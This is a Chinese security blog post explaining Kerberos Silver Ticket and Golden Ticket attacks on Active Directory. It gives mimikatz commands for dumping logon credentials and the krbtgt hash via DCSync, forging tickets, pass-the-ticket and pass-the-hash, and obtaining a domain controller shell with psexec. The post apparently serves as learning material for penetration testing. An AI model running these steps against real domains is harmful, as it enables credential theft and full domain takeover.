

<!DOCTYPE html>
<html lang="en" data-default-color-scheme=&#34;auto&#34;>



<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="/img/head.png">
  <link rel="icon" type="image/png" href="/img/head.png">
  <meta name="viewport"
        content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="description" content="">
  <meta name="author" content="SE_NULL">
  <meta name="keywords" content="">
  <title>白银票据和黄金票据 - SE_Null</title>

  <link  rel="stylesheet" href="https://cdn.staticfile.org/twitter-bootstrap/4.4.1/css/bootstrap.min.css" />


  <link  rel="stylesheet" href="https://cdn.staticfile.org/github-markdown-css/4.0.0/github-markdown.min.css" />
  <link  rel="stylesheet" href="/lib/hint/hint.min.css" />

  
    
    
      
      <link  rel="stylesheet" href="https://cdn.staticfile.org/highlight.js/10.0.0/styles/github-gist.min.css" />
    
  

  


<!-- 主题依赖的图标库，不要自行修改 -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_pf9vaxs7x7b.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_kmeydafke9r.css">


<link  rel="stylesheet" href="/css/main.css" />

<!-- 自定义样式保持在最底部 -->


  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
<meta name="generator" content="Hexo 5.2.0"></head>


<body>
  <header style="height: 70vh;">
    <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand"
       href="/">&nbsp;<strong>SE_Null</strong>&nbsp;</a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/">
                <i class="iconfont icon-home-fill"></i>
                Home
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/">
                <i class="iconfont icon-archive-fill"></i>
                Archives
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/">
                <i class="iconfont icon-category-fill"></i>
                Categories
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/">
                <i class="iconfont icon-tags-fill"></i>
                Tags
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/">
                <i class="iconfont icon-user-fill"></i>
                About
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" data-toggle="modal" data-target="#modalSearch">&nbsp;<i
                class="iconfont icon-search"></i>&nbsp;</a>
          </li>
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" href="javascript:">&nbsp;<i
                class="iconfont icon-dark" id="color-toggle-icon"></i>&nbsp;</a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

    <div class="banner intro-2" id="background" parallax=true
         style="background: url('/img/5.png') no-repeat center center;
           background-size: cover;">
      <div class="full-bg-img">
        <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
          <div class="container page-header text-center fade-in-up">
            <span class="h2" id="subtitle">
              
            </span>

            
              <div class="mt-3">
  
  
    <span class="post-meta">
      <i class="iconfont icon-date-fill" aria-hidden="true"></i>
      <time datetime="2020-10-14 16:24" pubdate>
        October 14, 2020 pm
      </time>
    </span>
  
</div>

<div class="mt-1">
  
    
    <span class="post-meta mr-2">
      <i class="iconfont icon-chart"></i>
      1k 字
    </span>
  

  
    
    <span class="post-meta mr-2">
      <i class="iconfont icon-clock-fill"></i>
      
      
      12
       分钟
    </span>
  

  
  
</div>

            
          </div>

          
        </div>
      </div>
    </div>
  </header>

  <main>
    
      

<div class="container-fluid">
  <div class="row">
    <div class="d-none d-lg-block col-lg-2"></div>
    <div class="col-lg-8 nopadding-md">
      <div class="container nopadding-md" id="board-ctn">
        <div class="py-5" id="board">
          <article class="post-content mx-auto" id="post">
            <!-- SEO header -->
            <h1 style="display: none">白银票据和黄金票据</h1>
            
            <div class="markdown-body" id="post-body">
              <a id="more"></a>
<h2 id="1-白银票据"><a href="#1-白银票据" class="headerlink" title="1.白银票据"></a>1.白银票据</h2><p><strong>原理</strong>：在Kerberos认证的第三步，Client带着ST和Authenticator3向Server上的某个服务进行请求，Server接收到Client的请求之后,通过自己的Master Key 解密ST,从而获得 Session Key。通过 Session Key 解密 Authenticator3,进而验证对方的身份,验证成功就让 Client 访问server上的指定服务了。<br> 所以我们只需要知道Server用户的Hash就可以伪造出一个ST,且不会经过KDC,但是伪造的门票只对部分服务起作用。</p>
<p><strong>特点</strong>：1.不需要与KDC进行交互、2.需要目标服务的NTLM Hash</p>
<p>在第三步认证中Ticket的组成：Ticket=Server Hash(Server Session Key+client info+End Time)</p>
<p>当拥有server hash时，就可以伪造一个不经过KDC认证的ticket（当server session key在未发送ticket之前，服务器是不知道server session key是什么的，所以，一切来源于server hash）</p>
<p><strong>攻击</strong>：使用mimikat进行kerberos进行攻击</p>
<p>首先用mimikatz在客户机上抓取信息：</p>
<pre><code class="hljs cpp">privilege::debug
sekurlsa::logonpasswords</code></pre>

<p><img src="/2020/10/14/%E7%A5%A8%E6%8D%AE%E5%92%8C%E9%BB%84%E9%87%91%E7%A5%A8%E6%8D%AE/image-20210202142456321.png" srcset="/img/loading.gif" alt="image-20210202142456321"></p>
<p>先清空之前存在的票据：<code>kerberos : : purge</code></p>
<p><img src="/2020/10/14/%E7%A5%A8%E6%8D%AE%E5%92%8C%E9%BB%84%E9%87%91%E7%A5%A8%E6%8D%AE/image-20210202175713372.png" srcset="/img/loading.gif" alt="image-20210202175713372"></p>
<p>然后进行伪造票据：</p>
<pre><code class="hljs dts"><span class="hljs-symbol">kerberos:</span>:golden /domain:<span class="hljs-params">&lt;域名&gt;</span>/sid:<span class="hljs-params">&lt;域SID&gt;</span>/target<span class="hljs-params">&lt;目标服务器主机名&gt;</span> /service:<span class="hljs-params">&lt;服务类型&gt;</span>/rc4:<span class="hljs-params">&lt;NTLMHash&gt;</span> /user:<span class="hljs-params">&lt;用户名&gt;</span> /ptt
<span class="hljs-meta"># /domain:域名</span>
<span class="hljs-meta"># /sid: 域控SID值</span>
<span class="hljs-meta"># /target:域控机器全称</span>
<span class="hljs-meta"># /service:需要指定相关的服务名</span>
<span class="hljs-meta"># /rc4:域控的计算机账户ntlm hash</span>
<span class="hljs-meta"># /user:要伪造的用户名，任意填写，可写可不写</span></code></pre>

<p>​            服务类型有</p>
<p><img src="/2020/10/14/%E7%A5%A8%E6%8D%AE%E5%92%8C%E9%BB%84%E9%87%91%E7%A5%A8%E6%8D%AE/image-20210202175302660.png" srcset="/img/loading.gif" alt="image-20210202175302660"></p>
<p><img src="/2020/10/14/%E7%A5%A8%E6%8D%AE%E5%92%8C%E9%BB%84%E9%87%91%E7%A5%A8%E6%8D%AE/image-20210202182414994.png" srcset="/img/loading.gif" alt="image-20210202182414994"></p>
<p>查看当前拥有的票据：<code>kerberos::list</code></p>
<p><img src="/2020/10/14/%E7%A5%A8%E6%8D%AE%E5%92%8C%E9%BB%84%E9%87%91%E7%A5%A8%E6%8D%AE/image-20210202182511993.png" srcset="/img/loading.gif" alt="image-20210202182511993"></p>
<p>查看是否可以访问域控的资源：<code>net use \\域控ip\磁盘符$</code>，但是会要求认证</p>
<p><img src="/2020/10/14/%E7%A5%A8%E6%8D%AE%E5%92%8C%E9%BB%84%E9%87%91%E7%A5%A8%E6%8D%AE/image-20210202212307313.png" srcset="/img/loading.gif" alt="image-20210202212307313"></p>
<p>在使用win2008进行票据伪造的时候并没有认证。</p>
<p><img src="/2020/10/14/%E7%A5%A8%E6%8D%AE%E5%92%8C%E9%BB%84%E9%87%91%E7%A5%A8%E6%8D%AE/image-20210202190127055.png" srcset="/img/loading.gif" alt="image-20210202190127055"></p>
<p>查看访问的资源：<code>dir \\域控ip\磁盘符$</code></p>
<p><img src="/2020/10/14/%E7%A5%A8%E6%8D%AE%E5%92%8C%E9%BB%84%E9%87%91%E7%A5%A8%E6%8D%AE/image-20210202190222105.png" srcset="/img/loading.gif" alt="image-20210202190222105"></p>
<p>后续要访问其他文件资源，直接在<code>dir \\域控ip\磁盘符$</code>跟文件夹，例如：<code>dir \\域控ip\磁盘符$\test</code></p>
<p>另外也可以使用pth进行连接：<code>sekurlsa::pth /user:administrator /domain:域控名 /ntlm:域控hsah值 </code>，执行后会弹出一个cmd框。之后再<code>net use \\域控ip\磁盘符$</code>连接即可。</p>
<p>注：另外，在win2003上操作时，票据无法成功创建，会报以下错误：</p>
<pre><code class="hljs subunit"><span class="hljs-keyword">ERROR </span>kuhl_m_kerberos_ptt_data ; LsaCallAuthenticationPackage KerbSubmitTicketMessage : c000000d</code></pre>



<h2 id="2-黄金票据"><a href="#2-黄金票据" class="headerlink" title="2.黄金票据"></a>2.黄金票据</h2><p><strong>原理</strong>通过前面我们已经知道Kerberos的认证大致流程，在第二阶段认证的KRB_AS_REQ时，Client拥有两份加密的session Key,K( c,tgs )分别是:</p>
<p>1.用自己NTLM Hash加密的session Key. </p>
<p>2.用krbtgt用户的NTLM Hash加密的TGT。</p>
<p>前面我们说过，TGT只有KDC可以解密，这是因为TGT是使用krbtgt用户的NTLM Hash进行加密的，而该Hash只有KDC知道。但是这也意味着如果我们拥有krbtgt用户的Hash，那么意味着我们可以解密以及伪造TGT</p>
<p>使用mimikatz进行攻击</p>
<p><strong>攻击</strong>：使用mimikatz</p>
<p>首先在域控上将krbtgt的用户hash使用mimikatz给dump下来：<code>lsadump::dcsync /domain:域控名 /user:krbtgt</code></p>
<p><img src="/2020/10/14/%E7%A5%A8%E6%8D%AE%E5%92%8C%E9%BB%84%E9%87%91%E7%A5%A8%E6%8D%AE/image-20210202191139393.png" srcset="/img/loading.gif" alt="image-20210202191139393"></p>
<p>然后在客户机上执行</p>
<p><code>kerberos:.golden /domain:&lt;域名&gt;/sid:&lt;域SID&gt; /aes256:&lt;aes256_hmac&gt; /user:&lt;任意用户名&gt;/ptt</code></p>
<p>或者</p>
<p><code>kerberos:golden /domain:&lt;域名&gt;/sid:&lt;域SID&gt;/rC4:&lt;KRBTGT NTLM Hash&gt; /user:&lt;任意用户名&gt;/ptt</code></p>
<p>或者</p>
<p><code>kerberos: :golden /admin:Administrator /domain:&lt;域名&gt; /sid:&lt;域SID&gt; /krbtgt:&lt;KRBTGT Hash NTLM&gt;  /ticket: Administrator.kiribi</code></p>
<p>生成一个票据文件</p>
<p><img src="/2020/10/14/%E7%A5%A8%E6%8D%AE%E5%92%8C%E9%BB%84%E9%87%91%E7%A5%A8%E6%8D%AE/image-20210202192045542.png" srcset="/img/loading.gif" alt="image-20210202192045542"></p>
<p>在使用ptt进行票据攻击：<code>Kerberos::ptt Administrator.kiribi</code></p>
<p><img src="/2020/10/14/%E7%A5%A8%E6%8D%AE%E5%92%8C%E9%BB%84%E9%87%91%E7%A5%A8%E6%8D%AE/image-20210202192205698.png" srcset="/img/loading.gif" alt="image-20210202192205698"></p>
<p>此时已得到域控完整权限，可以使用psexec获得域控cmd权限：<code>psexec [\\域控ip](file://域控ip) cmd</code></p>
<p><img src="/2020/10/14/%E7%A5%A8%E6%8D%AE%E5%92%8C%E9%BB%84%E9%87%91%E7%A5%A8%E6%8D%AE/image-20210202192514462.png" srcset="/img/loading.gif" alt="image-20210202192514462"></p>
<h2 id="3-黄金票据和白银票据区别"><a href="#3-黄金票据和白银票据区别" class="headerlink" title="3.黄金票据和白银票据区别"></a>3.黄金票据和白银票据区别</h2><h3 id="1-获取权限不同"><a href="#1-获取权限不同" class="headerlink" title="1.获取权限不同"></a>1.获取权限不同</h3><p>金票：伪造的TGT，可以获取任意Kerberos的访问权限<br>银票：伪造的ST，只能访问指定的服务，如CIFS</p>
<h3 id="2-认证流程不同"><a href="#2-认证流程不同" class="headerlink" title="2.认证流程不同"></a>2.认证流程不同</h3><p>金票：同KDC交互，但不同AS交互<br>银票：不同KDC交互，直接访问Server</p>
<h3 id="3-加密方式不同"><a href="#3-加密方式不同" class="headerlink" title="3.加密方式不同"></a>3.加密方式不同</h3><p>金票：由krbtgt NTLM Hash 加密<br>银票：由服务账号 NTLM Hash 加密</p>
<h2 id="4-两者结果"><a href="#4-两者结果" class="headerlink" title="4.两者结果"></a>4.两者结果</h2><p>金票：能够在域里边所有机器上都以administrator登录</p>
<p>银票：实用白银票据添加cifs后，dir由无权查看变为有权查看</p>

            </div>
            <hr>
            <div>
              <div class="post-metas mb-3">
                
                  <div class="post-meta mr-3">
                    <i class="iconfont icon-category"></i>
                    
                      <a class="hover-with-bg" href="/categories/%E5%86%85%E7%BD%91%E5%AE%89%E5%85%A8/">内网安全</a>
                    
                  </div>
                
                
                  <div class="post-meta">
                    <i class="iconfont icon-tags"></i>
                    
                      <a class="hover-with-bg" href="/tags/%E9%BB%84%E9%87%91%E7%A5%A8%E6%8D%AE/">黄金票据</a>
                    
                      <a class="hover-with-bg" href="/tags/%E7%99%BD%E9%93%B6%E7%A5%A8%E6%8D%AE/">白银票据</a>
                    
                      <a class="hover-with-bg" href="/tags/%E9%BB%84%E9%87%91%E7%A5%A8%E6%8D%AE%E5%92%8C%E7%99%BD%E9%93%B6%E7%A5%A8%E6%8D%AE%E5%8C%BA%E5%88%AB/">黄金票据和白银票据区别</a>
                    
                  </div>
                
              </div>
              
                <p class="note note-warning">转载请注明出处！</p>
              
              
                <div class="post-prevnext row">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/2020/10/15/bloodhound-sharphound/">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">bloodhound+sharphound</span>
                        <span class="visible-mobile">Previous</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2020/10/13/%E5%A5%87%E6%8A%80%E6%B7%AB%E5%B7%A7/">
                        <span class="hidden-mobile">奇技淫巧</span>
                        <span class="visible-mobile">Next</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
          </article>
        </div>
      </div>
    </div>
    
      <div class="d-none d-lg-block col-lg-2 toc-container" id="toc-ctn">
        <div id="toc">
  <p class="toc-header"><i class="iconfont icon-list"></i>&nbsp;TOC</p>
  <div id="tocbot"></div>
</div>

      </div>
    
  </div>
</div>

<!-- Custom -->


    
  </main>

  
    <a id="scroll-top-button" href="#" role="button">
      <i class="iconfont icon-arrowup" aria-hidden="true"></i>
    </a>
  

  
    <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">Search</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v"
                 for="local-search-input">keyword</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>
  

  

  

  <footer class="mt-5">
  <div class="text-center py-3">
    <!-- <div>
      <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a>
      <i class="iconfont icon-love"></i>
      <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener">
        <span>Fluid</span></a>
    </div> -->
    
  <div class="statistics">
    
    

    
      
        <!-- 不蒜子统计PV -->
        <span id="busuanzi_container_site_pv" style="display: none">
            总访问量 
            <span id="busuanzi_value_site_pv"></span>
             次
          </span>
      
      
        <!-- 不蒜子统计UV -->
        <span id="busuanzi_container_site_uv" style="display: none">
            总访客数 
            <span id="busuanzi_value_site_uv"></span>
             人
          </span>
      
    
  </div>


    

    
  </div>
</footer>

<!-- SCRIPTS -->
<script  src="https://cdn.staticfile.org/jquery/3.4.1/jquery.min.js" ></script>
<script  src="https://cdn.staticfile.org/twitter-bootstrap/4.4.1/js/bootstrap.min.js" ></script>
<script  src="/js/debouncer.js" ></script>
<script  src="/js/main.js" ></script>

<!-- Plugins -->


  
    <script  src="/js/lazyload.js" ></script>
  



  



  <script defer src="https://cdn.staticfile.org/clipboard.js/2.0.6/clipboard.min.js" ></script>
  <script  src="/js/clipboard-use.js" ></script>



  <script defer src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js" ></script>





  <script  src="https://cdn.staticfile.org/tocbot/4.11.1/tocbot.min.js" ></script>
  <script>
    $(document).ready(function () {
      var boardCtn = $('#board-ctn');
      var boardTop = boardCtn.offset().top;

      tocbot.init({
        tocSelector: '#tocbot',
        contentSelector: '#post-body',
        headingSelector: 'h1,h2,h3,h4,h5,h6',
        linkClass: 'tocbot-link',
        activeLinkClass: 'tocbot-active-link',
        listClass: 'tocbot-list',
        isCollapsedClass: 'tocbot-is-collapsed',
        collapsibleClass: 'tocbot-is-collapsible',
        collapseDepth: 0,
        scrollSmooth: true,
        headingsOffset: -boardTop
      });
      if ($('.toc-list-item').length > 0) {
        $('#toc').css('visibility', 'visible');
      }
    });
  </script>



  <script  src="https://cdn.staticfile.org/typed.js/2.0.11/typed.min.js" ></script>
  <script>
    var typed = new Typed('#subtitle', {
      strings: [
        '  ',
        "白银票据和黄金票据&nbsp;",
      ],
      cursorChar: "",
      typeSpeed: 100,
      loop: false,
    });
    typed.stop();
    $(document).ready(function () {
      $(".typed-cursor").addClass("h2");
      typed.start();
    });
  </script>



  <script  src="https://cdn.staticfile.org/anchor-js/4.2.2/anchor.min.js" ></script>
  <script>
    anchors.options = {
      placement: "right",
      visible: "hover",
      
    };
    var el = "h1,h2,h3,h4,h5,h6".split(",");
    var res = [];
    for (item of el) {
      res.push(".markdown-body > " + item)
    }
    anchors.add(res.join(", "))
  </script>



  <script  src="/js/local-search.js" ></script>
  <script>
    var path = "/local-search.xml";
    var inputArea = document.querySelector("#local-search-input");
    inputArea.onclick = function () {
      searchFunc(path, 'local-search-input', 'local-search-result');
      this.onclick = null
    }
  </script>



  <script  src="https://cdn.staticfile.org/fancybox/3.5.7/jquery.fancybox.min.js" ></script>
  <link  rel="stylesheet" href="https://cdn.staticfile.org/fancybox/3.5.7/jquery.fancybox.min.css" />

  <script>
    $('#post img:not(.no-zoom img, img[no-zoom]), img[zoom]').each(
      function () {
        var element = document.createElement('a');
        $(element).attr('data-fancybox', 'images');
        $(element).attr('href', $(this).attr('src'));
        $(this).wrap(element);
      }
    );
  </script>







  
  
    <script>
      !function (e, t, a) {
        function r() {
          for (var e = 0; e < s.length; e++) s[e].alpha <= 0 ? (t.body.removeChild(s[e].el), s.splice(e, 1)) : (s[e].y--, s[e].scale += .004, s[e].alpha -= .013, s[e].el.style.cssText = "left:" + s[e].x + "px;top:" + s[e].y + "px;opacity:" + s[e].alpha + ";transform:scale(" + s[e].scale + "," + s[e].scale + ") rotate(45deg);background:" + s[e].color + ";z-index:99999");
          requestAnimationFrame(r)
        }

        function n() {
          var t = "function" == typeof e.onclick && e.onclick;
          e.onclick = function (e) {
            t && t(), o(e)
          }
        }

        function o(e) {
          var a = t.createElement("div");
          a.className = "heart", s.push({
            el: a,
            x: e.clientX - 5,
            y: e.clientY - 5,
            scale: 1,
            alpha: 1,
            color: c()
          }), t.body.appendChild(a)
        }

        function i(e) {
          var a = t.createElement("style");
          a.type = "text/css";
          try {
            a.appendChild(t.createTextNode(e))
          } catch (t) {
            a.styleSheet.cssText = e
          }
          t.getElementsByTagName("head")[0].appendChild(a)
        }

        function c() {
          return "rgb(" + ~~(255 * Math.random()) + "," + ~~(255 * Math.random()) + "," + ~~(255 * Math.random()) + ")"
        }

        var s = [];
        e.requestAnimationFrame = e.requestAnimationFrame || e.webkitRequestAnimationFrame || e.mozRequestAnimationFrame || e.oRequestAnimationFrame || e.msRequestAnimationFrame || function (e) {
          setTimeout(e, 1e3 / 60)
        }, i(".heart{width: 10px;height: 10px;position: fixed;background: #f00;transform: rotate(45deg);-webkit-transform: rotate(45deg);-moz-transform: rotate(45deg);}.heart:after,.heart:before{content: '';width: inherit;height: inherit;background: inherit;border-radius: 50%;-webkit-border-radius: 50%;-moz-border-radius: 50%;position: fixed;}.heart:after{top: -5px;}.heart:before{left: -5px;}"), n(), r()
      }(window, document);
    </script>
  














</body>
</html>
